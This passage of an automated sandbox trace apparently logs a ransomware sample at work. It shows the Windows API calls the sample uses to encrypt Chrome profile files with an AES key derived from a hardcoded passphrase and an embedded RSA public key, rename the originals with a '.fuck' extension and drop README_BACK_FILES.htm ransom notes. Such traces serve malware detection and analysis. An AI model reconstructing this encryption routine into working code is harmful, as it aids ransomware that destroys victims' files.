dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0247.221] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old.gsg", dwFileAttributes=0x2) returned 1 [0247.222] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x28f6348) returned 1 [0247.226] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0247.226] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.226] CryptHashData (hHash=0x2938af8, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.226] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x2938af8, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2938ab8) returned 1 [0247.226] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.226] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0247.227] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x28f52d0) returned 1 [0247.227] CryptImportPublicKeyInfo (in: hCryptProv=0x28f52d0, dwCertEncodingType=0x1, pInfo=0x2935780*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29357b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29357b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x29383b8) returned 1 [0247.227] CryptEncrypt (in: hKey=0x29383b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0247.227] CryptEncrypt (in: hKey=0x29383b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f54f0*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x28f54f0*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0247.227] WriteFile (in: hFile=0x5d40, lpBuffer=0x28f54f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x28f54f0*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0247.228] ReadFile (in: hFile=0x5d4c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x92, lpOverlapped=0x0) returned 1 [0247.229] CryptEncrypt (in: hKey=0x2938ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x92, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0xa0) returned 1 [0247.229] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0xa0, lpOverlapped=0x0) returned 1 [0247.230] CloseHandle (hObject=0x5d4c) returned 1 [0247.230] CloseHandle (hObject=0x5d40) returned 1 [0247.231] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.old.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.old"), bFailIfExists=0) returned 1 [0247.237] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old", dwFileAttributes=0x0) returned 1 [0247.237] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.old.gsg")) returned 1 [0247.238] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.old"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.old.fuck")) returned 1 [0247.240] CryptDestroyHash (hHash=0x2938af8) returned 1 [0247.240] CryptDestroyKey (hKey=0x2938ab8) returned 1 [0247.240] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0247.240] FindNextFileA (in: hFindFile=0x2938a38, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.240] FindNextFileA (in: hFindFile=0x2938a38, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0247.240] FindClose (in: hFindFile=0x2938a38 | out: hFindFile=0x2938a38) returned 1 [0247.240] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\readme_back_files.htm")) returned 0xffffffff [0247.240] AreFileApisANSI () returned 1 [0247.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0247.240] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0247.241] GetFileType (hFile=0x5d48) returned 0x1 [0247.242] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0247.243] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.243] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x29389f8 [0247.274] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.274] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.275] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0247.275] GetLastError () returned 0x0 [0247.275] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log")) returned 0x20 [0247.276] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", dwFileAttributes=0x80) returned 1 [0247.276] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0247.277] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0247.278] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.gsg", dwFileAttributes=0x2) returned 1 [0247.279] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x28f6348) returned 1 [0247.281] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0247.281] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.281] CryptHashData (hHash=0x2938678, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.281] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x2938678, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2938778) returned 1 [0247.281] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.281] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0247.282] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x28f5578) returned 1 [0247.282] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5578, dwCertEncodingType=0x1, pInfo=0x2935850*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935880*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935888*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2938578) returned 1 [0247.282] CryptEncrypt (in: hKey=0x2938578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0247.282] CryptEncrypt (in: hKey=0x2938578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f58a8*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x28f58a8*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0247.282] WriteFile (in: hFile=0x5d4c, lpBuffer=0x28f58a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x28f58a8*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0247.283] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.482] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0247.482] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.508] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x166, lpOverlapped=0x0) returned 1 [0247.508] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x166, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x170) returned 1 [0247.508] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x170, lpOverlapped=0x0) returned 1 [0247.508] CloseHandle (hObject=0x5d40) returned 1 [0247.508] CloseHandle (hObject=0x5d4c) returned 1 [0247.509] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), bFailIfExists=0) returned 1 [0247.512] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", dwFileAttributes=0x0) returned 1 [0247.512] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.gsg")) returned 1 [0247.513] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.fuck")) returned 1 [0247.514] CryptDestroyHash (hHash=0x2938678) returned 1 [0247.514] CryptDestroyKey (hKey=0x2938778) returned 1 [0247.514] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0247.514] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.515] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.515] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.515] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.515] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0247.515] GetLastError () returned 0x0 [0247.515] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.old")) returned 0x20 [0247.516] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old", dwFileAttributes=0x80) returned 1 [0247.516] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.old"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0247.516] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.old.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0247.517] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old.gsg", dwFileAttributes=0x2) returned 1 [0247.517] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x28f6348) returned 1 [0247.520] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0247.520] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.520] CryptHashData (hHash=0x2938a38, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.520] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x2938a38, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2938af8) returned 1 [0247.520] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.520] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0247.520] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x28f5a40) returned 1 [0247.521] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5a40, dwCertEncodingType=0x1, pInfo=0x29359f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935a20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935a28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2938478) returned 1 [0247.521] CryptEncrypt (in: hKey=0x2938478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0247.521] CryptEncrypt (in: hKey=0x2938478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5ac8*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x28f5ac8*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0247.521] WriteFile (in: hFile=0x5d40, lpBuffer=0x28f5ac8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x28f5ac8*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0247.535] ReadFile (in: hFile=0x5d4c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x14e, lpOverlapped=0x0) returned 1 [0247.537] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x14e, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x150) returned 1 [0247.537] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x150, lpOverlapped=0x0) returned 1 [0247.537] CloseHandle (hObject=0x5d4c) returned 1 [0247.537] CloseHandle (hObject=0x5d40) returned 1 [0247.538] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.old.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.old"), bFailIfExists=0) returned 1 [0247.542] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old", dwFileAttributes=0x0) returned 1 [0247.542] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.old.gsg")) returned 1 [0247.543] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.old"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.old.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.old.fuck")) returned 1 [0247.544] CryptDestroyHash (hHash=0x2938a38) returned 1 [0247.544] CryptDestroyKey (hKey=0x2938af8) returned 1 [0247.544] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0247.544] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.544] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0247.544] FindClose (in: hFindFile=0x29389f8 | out: hFindFile=0x29389f8) returned 1 [0247.544] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\readme_back_files.htm")) returned 0xffffffff [0247.544] AreFileApisANSI () returned 1 [0247.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0247.545] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0247.545] GetFileType (hFile=0x5d48) returned 0x1 [0247.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0247.546] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.546] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x29388b8 [0247.560] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.560] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.560] FindFirstFileA (in: 